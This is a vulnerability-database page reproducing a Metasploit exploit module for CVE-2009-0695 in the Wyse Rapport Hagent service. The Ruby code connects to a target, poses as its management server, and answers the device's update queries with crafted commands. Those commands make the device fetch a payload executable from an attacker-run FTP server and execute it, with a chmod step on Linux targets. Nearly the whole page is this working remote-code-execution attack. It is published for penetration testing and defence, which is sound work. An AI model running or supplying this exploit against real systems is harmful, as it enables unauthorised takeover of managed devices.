Lucene search
K

Wyse Rapport Hagent Fake Hserver Command Execution

🗓️ 09 Sep 2009 21:23:11Reported by kf <[email protected]>Type 
metasploit
 metasploit
🔗 www.rapid7.com👁 60 Views

This module exploits the Wyse Rapport Hagent service by pretending to be a legitimate server. It involves starting both HTTP and FTP services on the attacker side, then contacting the Hagent service of the target and indicating that an update is available. The target will then download the payload wrapped in an executable from the FTP service

Related
Code
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'timeout'

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::Tcp
  include Msf::Exploit::Remote::FtpServer
  include Msf::Exploit::EXE

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Wyse Rapport Hagent Fake Hserver Command Execution',
      'Description'    => %q{
          This module exploits the Wyse Rapport Hagent service by pretending to
        be a legitimate server. This process involves starting both HTTP and
        FTP services on the attacker side, then contacting the Hagent service of
        the target and indicating that an update is available. The target will
        then download the payload wrapped in an executable from the FTP service.
      },
      'Stance'         => Msf::Exploit::Stance::Aggressive,
      'Author'         => 'kf',
      'References'     =>
        [
          ['CVE', '2009-0695'],
          ['OSVDB', '55839'],
          ['US-CERT-VU', '654545'],
          ['URL', 'http://snosoft.blogspot.com/'],
          ['URL', 'http://www.theregister.co.uk/2009/07/10/wyse_remote_exploit_bugs/']
        ],
      'Privileged'     => true,
      'Payload'        =>
        {
          'Space'    => 2048,
          'BadChars' => '',
        },
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'process',
        },
      'Platform'       => %w{ win linux },
      'Targets'        =>
        [
          [ 'Windows XPe x86',{'Platform' => 'win',}],
          [ 'Wyse Linux x86', {'Platform' => 'linux',}],
        ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => '2009-07-10'
    ))

    register_options(
      [
        OptPort.new('SRVPORT',    [ true, "The local port to use for the FTP server", 21 ]),
        Opt::RPORT(80),
      ])
  end


  def exploit

    if(datastore['SRVPORT'].to_i != 21)
      print_error("This exploit requires the FTP service to run on port 21")
      return
    end

    # Connect to the target service
    print_status("Connecting to the target")
    connect()

    # Start the FTP service
    print_status("Starting the FTP server")
    start_service()

    # Create the executable with our payload
    print_status("Generating the EXE")
    @exe_file = generate_payload_exe
    if target['Platform'] == 'win'
      maldir      = "C:\\"  		# Windows
      malfile     = Rex::Text.rand_text_alphanumeric(rand(8)+4) + ".exe"
      co = "XP"
    elsif  target['Platform'] == 'linux'
      maldir      = "//tmp//"		# Linux
      malfile     = Rex::Text.rand_text_alphanumeric(rand(8)+4) + ".bin"
      co = "LXS"
    end
    @exe_sent = false

    # Start the HTTP service
    print_status("Starting the HTTP service")
    wdmserver  = Rex::Socket::TcpServer.create({
      'Context'   => {
        'Msf'        => framework,
        'MsfExploit' => self
      }
    })

    # Let this close automatically
    add_socket(wdmserver)

    wdmserver_port = wdmserver.getsockname[2]
    print_status("Starting the HTTP service on port #{wdmserver_port}")


    fakerapport = Rex::Socket.source_address(rhost)
    fakemac     = "00" + Rex::Text.rand_text(5).unpack("H*")[0]
    mal = "&V54&CI=3|MAC=#{fakemac}|IP=#{rhost}MT=3|HS=#{fakerapport}|PO=#{wdmserver_port}|"

    # FTP Credentials
    ftpserver = Rex::Socket.source_address(rhost)
    ftpuser   = Rex::Text.rand_text_alphanumeric(rand(8)+1)
    ftppass   = Rex::Text.rand_text_alphanumeric(rand(8)+1)
    ftpport   = 21
    ftpsecure = '0'

    incr = 10
    pwn1 =
      "&UP0|&SI=1|UR=9" +
      "|CO \x0f#{co}\x0f|#{incr}" +
      # "|LU \x0fRapport is downloading HAgent Upgrade to this terminal\x0f|#{incr+1}" +
      "|SF \x0f#{malfile}\x0f \x0f#{maldir}#{malfile}\x0f|#{incr+1}"

    pwn2 = "|EX \x0f//bin//chmod\xfc+x\xfc//tmp//#{malfile}\x0f|#{incr+1}"

    pwn3 =
      "|EX \x0f#{maldir}#{malfile}\x0f|#{incr+1}" +
      # "|RB|#{incr+1}" +
      # "|SV* \x0fHKEY_LOCAL_MACHINE\\Software\\Rapport\\pwnt\x0f 31337\x0f\x0f REG_DWORD\x0f|#{incr+1}" +
      #"|DF \x0f#{maldir}#{malfile}\x0f|#{incr+1}" +
      # FTP Paramaters
      "|&FTPS=#{ftpserver}" + "|&FTPU=#{ftpuser}" + "|&FTPP=#{ftppass}" + "|&FTPBw=10240" + "|&FTPST=200" +
        "|&FTPPortNumber=#{ftpport}" + "|&FTPSecure=#{ftpsecure}" +
      "|&M_FTPS=#{ftpserver}" + "|&M_FTPU=#{ftpuser}" + "|&M_FTPP=#{ftppass}" + "|&M_FTPBw=10240" +
        "|&M_FTPST=200" + "|&M_FTPPortNumber=#{ftpport}" + "|&M_FTPSecure=#{ftpsecure}" +
      # No clue
      "|&DP=1|&IT=3600|&CID=7|QUB=3|QUT=120|CU=1|"

    if target['Platform'] == 'win'
      pwn = pwn1 + pwn3
    elsif target['Platform'] == 'linux'
      pwn = pwn1 + pwn2 + pwn3
    end
    # Send the malicious request
    sock.put(mal)

    # Download some response data
    resp = sock.get_once(-1, 10)
    print_status("Received: #{resp}")

    if not resp
      print_error("No reply from the target, this may not be a vulnerable system")
      return
    end

    print_status("Waiting on a connection to the HTTP service")
    begin
      Timeout.timeout(190) do
        done = false
        while (not done and session = wdmserver.accept)
          req = session.recvfrom(2000)[0]
          next if not req
          next if req.empty?
          print_status("HTTP Request: #{req.split("\n")[0].strip}")

          case req
          when /V01/
            print_status("++ connected (#{session.peerhost}), " + "sending payload (#{pwn.size} bytes)")
            res = pwn
          when /V02/
            print_status("++ device sending V02 query...")
            res  = "&00|Existing Client With No Pending Updates|&IT=10|&CID=7|QUB=3|QUT=120|CU=1|"
            done = true

          when /V55/
            print_status("++ device sending V55 query...")
            res = pwn
          when /POST/  # PUT is used for non encrypted requests.
            print_status("++ device sending V55 query...")
            res = pwn
            done = true
          else
            print_status("+++ sending generic response...")
            res = pwn
          end

          print_status("Sending reply: #{res}")
          session.put(res)
          session.close
        end
      end
    rescue ::Timeout::Error
      print_status("Timed out waiting on the HTTP request")
      wdmserver.close
      disconnect
      return
    end

    print_status("Waiting on the FTP request...")
    stime = Time.now.to_f
    while(not @exe_sent)
      break if (stime + 90 < Time.now.to_f)
      select(nil, nil, nil, 0.25)
    end

    if(not @exe_sent)
      print_status("No executable sent :(")
    end

    wdmserver.close()

    handler
    disconnect
  end

  def on_client_command_retr(c,arg)
    print_status("#{@state[c][:name]} FTP download request for #{arg}")
    conn = establish_data_connection(c)
    if(not conn)
      c.put("425 Can't build data connection\r\n")
      return
    end

    c.put("150 Opening BINARY mode data connection for #{arg}\r\n")
    conn.put(@exe_file)
    c.put("226 Transfer complete.\r\n")
    conn.close
    @exe_sent = true
  end

  def on_client_command_size(c,arg)
    print_status("#{@state[c][:name]} FTP size request for #{arg}")
    c.put("213 #{@exe_file.length}\r\n")
  end


end

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

11 Mar 2022 01:08Current
0.7Low risk
Vulners AI Score0.7
CVSS 27.5
EPSS0.68887
60